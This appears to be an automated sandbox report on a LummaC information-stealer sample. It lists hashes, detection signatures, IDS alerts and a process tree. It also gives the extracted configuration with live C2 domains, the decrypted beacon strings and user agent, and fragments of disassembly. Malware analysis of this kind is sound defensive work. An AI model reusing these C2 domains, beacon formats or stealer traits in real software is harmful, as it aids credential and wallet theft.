Edit tour

Windows Analysis Report
Q7QR4k52HL.exe

Overview

General Information

Sample name:	Q7QR4k52HL.exe renamed because original name is a hash value
Original sample name:	1b513e6f8721e444a9364dd93630f015.exe
Analysis ID:	1588988
MD5:	1b513e6f8721e444a9364dd93630f015
SHA1:	0a0d7955dea854391d42735ab8aac65413b6250b
SHA256:	9185b7955fdbfce261dfb295163dd00a8ae71d77f28f675cf4e5c14017281575
Tags:	exeLummaStealeruser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

LummaC encrypted strings found

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Q7QR4k52HL.exe (PID: 6112 cmdline: "C:\Users\user\Desktop\Q7QR4k52HL.exe" MD5: 1B513E6F8721E444A9364DD93630F015)

WerFault.exe (PID: 3060 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6112 -s 1828 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["apporholis.shop", "skidjazzyric.click", "handscreamny.shop", "chipdonkeruz.shop", "crowdwarek.shop", "versersleep.shop", "robinsharez.shop", "soundtappysk.shop", "femalsabler.shop"], "Build id": "4h5VfH--"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1929908575.0000000000554000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1930124368.0000000000580000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000003.1743630116.0000000000553000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000003.1743436987.0000000000500000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1742800786.0000000000500000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Q7QR4k52HL.exe PID: 6112	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: Q7QR4k52HL.exe PID: 6112	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Q7QR4k52HL.exe PID: 6112	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 5 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T08:05:52.639698+0100	2028371	3	Unknown Traffic	192.168.2.4	49730	104.102.49.254	443	TCP
2025-01-11T08:05:54.001247+0100	2028371	3	Unknown Traffic	192.168.2.4	49731	104.21.48.1	443	TCP
2025-01-11T08:05:55.089181+0100	2028371	3	Unknown Traffic	192.168.2.4	49732	104.21.48.1	443	TCP
2025-01-11T08:05:56.589567+0100	2028371	3	Unknown Traffic	192.168.2.4	49733	104.21.48.1	443	TCP
2025-01-11T08:05:57.796598+0100	2028371	3	Unknown Traffic	192.168.2.4	49734	104.21.48.1	443	TCP
2025-01-11T08:05:59.377834+0100	2028371	3	Unknown Traffic	192.168.2.4	49735	104.21.48.1	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T08:05:54.410114+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49731	104.21.48.1	443	TCP
2025-01-11T08:05:55.542115+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49732	104.21.48.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T08:05:54.410114+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49731	104.21.48.1	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T08:05:55.542115+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49732	104.21.48.1	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (apporholis .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T08:05:51.809135+0100	2059035	1	Domain Observed Used for C2 Detected	192.168.2.4	64312	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chipdonkeruz .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T08:05:51.860815+0100	2059037	1	Domain Observed Used for C2 Detected	192.168.2.4	49771	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crowdwarek .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T08:05:51.819426+0100	2059039	1	Domain Observed Used for C2 Detected	192.168.2.4	65127	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (femalsabler .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T08:05:51.796137+0100	2059041	1	Domain Observed Used for C2 Detected	192.168.2.4	61422	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (handscreamny .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T08:05:51.948422+0100	2059043	1	Domain Observed Used for C2 Detected	192.168.2.4	55486	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (robinsharez .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T08:05:51.960576+0100	2059049	1	Domain Observed Used for C2 Detected	192.168.2.4	59369	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (skidjazzyric .click)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T08:05:51.771132+0100	2059088	1	Domain Observed Used for C2 Detected	192.168.2.4	59603	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soundtappysk .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T08:05:51.783603+0100	2059051	1	Domain Observed Used for C2 Detected	192.168.2.4	49715	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (versersleep .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T08:05:51.829550+0100	2059057	1	Domain Observed Used for C2 Detected	192.168.2.4	64183	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T08:05:57.196051+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49733	104.21.48.1	443	TCP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T08:05:53.402632+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.4	49730	104.102.49.254	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Q7QR4k52HL.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://sputnik-1985.com/apiN

Avira URL Cloud: Label: malware

Found malware configuration

Source: 0.3.Q7QR4k52HL.exe.2120000.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["apporholis.shop", "skidjazzyric.click", "handscreamny.shop", "chipdonkeruz.shop", "crowdwarek.shop", "versersleep.shop", "robinsharez.shop", "soundtappysk.shop", "femalsabler.shop"], "Build id": "4h5VfH--"}

Multi AV Scanner detection for submitted file

Source: Q7QR4k52HL.exe	Virustotal: Detection: 59%			Perma Link
Source: Q7QR4k52HL.exe	ReversingLabs: Detection: 65%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for sample

Source: Q7QR4k52HL.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.1930124368.0000000000580000.00000040.00001000.00020000.00000000.sdmp	String decryptor: robinsharez.shop
Source: 00000000.00000002.1930124368.0000000000580000.00000040.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.1930124368.0000000000580000.00000040.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.1930124368.0000000000580000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.1930124368.0000000000580000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.1930124368.0000000000580000.00000040.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.1930124368.0000000000580000.00000040.00001000.00020000.00000000.sdmp	String decryptor: 4h5VfH--

Source: C:\Users\user\Desktop\Q7QR4k52HL.exe

Code function: 0_2_00415720 CryptUnprotectData,

0_2_00415720

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\Q7QR4k52HL.exe

Unpacked PE file: 0.2.Q7QR4k52HL.exe.400000.0.unpack

Source: Q7QR4k52HL.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\Q7QR4k52HL.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49735 version: TLS 1.2

Source: C:\Users\user\Desktop\Q7QR4k52HL.exe

Directory queried: number of queries: 1001

Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov dword ptr [esp+3Ch], edx	0_2_0043B870
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov edx, ecx	0_2_0043B870
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov ecx, edx	0_2_0040B2B0
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+edi+72B923DBh]	0_2_0040C334
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov esi, ecx	0_2_00415720
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov ecx, eax	0_2_00415720
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 1ED645B4h	0_2_00419840
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then movzx edx, byte ptr [edi+eax]	0_2_0040A05C
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h	0_2_00427070
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	0_2_0042D830
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h	0_2_0043F0E0
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0041B882
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then jmp eax	0_2_004418A0
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0041B173
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	0_2_0042B170
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_0041A900
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0041B184
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then test esi, esi	0_2_0043C9A0
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov byte ptr [ecx], al	0_2_0041B243
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_0042EA62
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov eax, dword ptr [edi+0Ch]	0_2_00402210
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov ecx, eax	0_2_0040AA32
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+esi-00001458h]	0_2_00425AF0
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov ecx, eax	0_2_00428280
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	0_2_0041F2A0
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov ebx, eax	0_2_00405AB0
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov ebp, eax	0_2_00405AB0
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_0042EB5F
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_0042BB00
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0041BB21
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov dword ptr [esp+14h], 00000000h	0_2_00441B20
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_0041AB2A
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx+72B923DBh]	0_2_0040C3EC
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov ebx, edx	0_2_0042DBF0
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then jmp ecx	0_2_0040D334
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	0_2_00422380
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-000000E2h]	0_2_0041BBA0
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov dword ptr [ebx], 00000022h	0_2_0042BBA0
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_0042EBA1
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov ecx, eax	0_2_00440BAB
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_0042EBB3
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov dword ptr [esp+14h], 00000000h	0_2_00441BB0
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov dword ptr [esp+14h], 00000000h	0_2_00441C40
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov ecx, eax	0_2_00442470
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h	0_2_00426C76
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov eax, edi	0_2_0041C400
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_00417405
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edi+17ECFBF3h]	0_2_00417405
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov edx, ecx	0_2_00417405
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	0_2_00414C20
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov dword ptr [ebp-00000248h], 24272637h	0_2_0044042D
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov ecx, eax	0_2_0044042D
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_0041B484
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov word ptr [esi], cx	0_2_00427490
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h	0_2_00425D6A
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_00438520
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 4B884A2Eh	0_2_00442D20
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then push edi	0_2_0043C5A0
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then movzx edx, byte ptr [esp+edi+53BD8A12h]	0_2_0043C5A0
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	0_2_0042B652
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_0041B667
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov ecx, dword ptr [0044C548h]	0_2_00418672
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00409E09
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	0_2_00407620
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	0_2_00407620
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then jmp ecx	0_2_0040CEC7
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+00000128h]	0_2_00416ED0
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+3A4EC517h]	0_2_0041BEE1
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0041AEFF
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then movzx ebx, byte ptr [edx+eax-03DAF14Eh]	0_2_0040DFE2
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov byte ptr [eax], cl	0_2_0040DFE2
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+ebx+08h]	0_2_00408F90
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 0EF2A4EDh	0_2_004427B0
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov esi, ecx	0_2_008260EF
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_0081A070
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov dword ptr [esp+14h], 00000000h	0_2_008521EA
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+ebx+08h]	0_2_008191F7
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then jmp ecx	0_2_0081D12E
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+00000128h]	0_2_00827137
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+3A4EC517h]	0_2_0082C148
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0082B166
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then movzx edx, byte ptr [edi+eax]	0_2_0081A2C3
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then movzx ebx, byte ptr [edx+eax-03DAF14Eh]	0_2_0081E249
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov byte ptr [eax], cl	0_2_0081E249
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0082B3DA
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0082B3EB
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h	0_2_0084F347
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov byte ptr [ecx], al	0_2_0082B4AA
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov ecx, eax	0_2_008384E7
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov eax, dword ptr [edi+0Ch]	0_2_00812477
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+edi+72B923DBh]	0_2_0081C59B
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	0_2_008325E7
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	0_2_0082F507
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov dword ptr [ebp-00000248h], 24272637h	0_2_00850694
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov ecx, eax	0_2_00850694
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov ecx, eax	0_2_008526D7
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_0082B6EB
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov word ptr [esi], cx	0_2_008376F7
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then jmp ecx	0_2_0081D59B
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov eax, edi	0_2_0082C667
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_00848787
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_0082773F
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	0_2_00817887
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	0_2_00817887
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	0_2_0083B8B5
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	0_2_008258FA
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then push edi	0_2_0084C807
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then movzx edx, byte ptr [esp+edi+53BD8A12h]	0_2_0084C807
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov ecx, dword ptr [0044C548h]	0_2_00828809
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	0_2_0083DA97
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 1ED645B4h	0_2_00829AA7
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov dword ptr [esp+3Ch], edx	0_2_0084BAD7
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov edx, ecx	0_2_0084BAD7
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edi+17ECFBF3h]	0_2_00827AE4
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov edx, ecx	0_2_00827AE4
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0082BAE9
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 0EF2A4EDh	0_2_00852A17
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov ecx, edx	0_2_0081BA6C
